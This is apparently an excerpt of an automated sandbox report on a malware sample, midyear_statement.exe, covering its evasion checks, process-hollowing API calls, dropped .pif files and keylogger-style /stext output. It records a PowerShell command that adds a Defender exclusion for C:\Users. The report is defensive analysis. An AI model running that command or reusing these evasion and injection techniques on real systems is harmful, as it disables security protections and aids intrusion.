                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_1233F7A7 Sleep,ExitProcess, 24_2_1233F7A7
                      Source: C:\Windows\System32\svchost.exe - File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 27_2_0040DD85
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 24_2_1234A748
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 5574
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 4195
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Window / User API: threadDelayed 9520
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Window / User API: foregroundWindowGot 1755
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - API coverage: 9.9 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 - Thread sleep count: 5574 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 - Thread sleep count: 4195 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 - Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928 - Thread sleep count: 143 > 30
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928 - Thread sleep time: -429000s >= -30000s
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7924 - Thread sleep count: 139 > 30
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7924 - Thread sleep time: -69500s >= -30000s
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928 - Thread sleep count: 9520 > 30
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928 - Thread sleep time: -28560000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe - File opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe - File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exe - File Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Users\user\Desktop\midyear_statement.exe - Code function: 0_2_040A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_040A5878
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose, 24_2_00401612
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime, 24_2_0040128D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_12339253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 24_2_12339253
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_1234C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 24_2_1234C291
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_1233C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 24_2_1233C34D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_12339665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 24_2_12339665
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_12349AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 24_2_12349AF5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_1233BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 24_2_1233BB30
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_1233783C FindFirstFileW,FindNextFileW, 24_2_1233783C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_1233880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 24_2_1233880C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_1237E879 FindFirstFileExA, 24_2_1237E879
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_1233BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 24_2_1233BD37
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_146410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 24_2_146410F1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_14646580 FindFirstFileExA, 24_2_14646580
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 27_2_0040AE51 FindFirstFileW,FindNextFileW, 27_2_0040AE51
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 28_2_00407EF8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_12337C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 24_2_12337C97
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 27_2_00418981 memset,GetSystemInfo, 27_2_00418981
                      Source: svchost.exe, 00000009.00000002.3646811739.0000026BC204B000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2080000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.000000000077B000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW0
                      Source: svchost.exe, 00000009.00000002.3646615871.0000026BC202B000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000085C000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124E9000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124E0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124E9000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382585003.00000000124E5000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007BA000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000009.00000002.3644458412.0000026BC2002000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: bhv348F.tmp.27.dr - Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                      Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAWj
                      Source: svchost.exe, 00000009.00000002.3647045184.0000026BC208D000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000`
                      Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: &@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{#s
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007A6000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW_
                      Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000009.00000002.3646811739.0000026BC204B000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\midyear_statement.exe - API call chain: ExitProcess graph end node graph_0-35413
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - API call chain: ExitProcess graph end node graph_24-111133
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - API call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process information queried: ProcessInformation
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif - Code function: 24_2_1236BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_1236BB22
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,27_2_0040DD85
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_040B7A50
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_0059113F mov eax, dword ptr fs:[00000030h]24_2_0059113F
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_0059113F mov eax, dword ptr fs:[00000030h]24_2_0059113F
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005D4097 mov eax, dword ptr fs:[00000030h]24_2_005D4097
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123732B5 mov eax, dword ptr fs:[00000030h]24_2_123732B5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_14644AB4 mov eax, dword ptr fs:[00000030h]24_2_14644AB4
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12341CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,24_2_12341CFE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess token adjusted: Debug
                      Source: C:\Windows \System32\2506803.exeCode function: 16_2_613C21C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_613C21C0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_1236BB22
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12364B47 SetUnhandledExceptionFilter,24_2_12364B47
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123649F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_123649F9
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12364FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_12364FDC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_14642639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_14642639
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_146460E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_146460E2
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_14642B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_14642B1C

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIF | Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIF | Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_123480EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 24_2_123480EF
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 293008
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIF | Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 2C2008
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIF | Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 3B2008
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 24_2_123420F7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_12349627 mouse_event, 24_2_12349627
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIF | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIF | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerP5\0
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager"
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager573ef12
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerP5\
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerk
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerP5\22
                      Source: wkrriuhD.pif, 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerP5\511
                      Source: wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, logs.dat.24.dr | Binary or memory string: [Program Manager]
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_005C5A34 cpuid 24_2_005C5A34
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_040A5A3C
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: GetLocaleInfoA, 0_2_040AA708
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: GetLocaleInfoA, 0_2_040AA754
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_040A5B48
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: GetLocaleInfoA, 24_2_1233F8D1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: GetLocaleInfoW, 24_2_12382313
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: EnumSystemLocalesW, 24_2_12382036
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 24_2_123820C3
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 24_2_12382610
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 24_2_1238243C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: EnumSystemLocalesW, 24_2_12378404
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: GetLocaleInfoW, 24_2_12382543
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: GetLocaleInfoW, 24_2_123788ED
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: EnumSystemLocalesW, 24_2_12381F50
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: EnumSystemLocalesW, 24_2_12381F9B
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 24_2_12381CD8
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
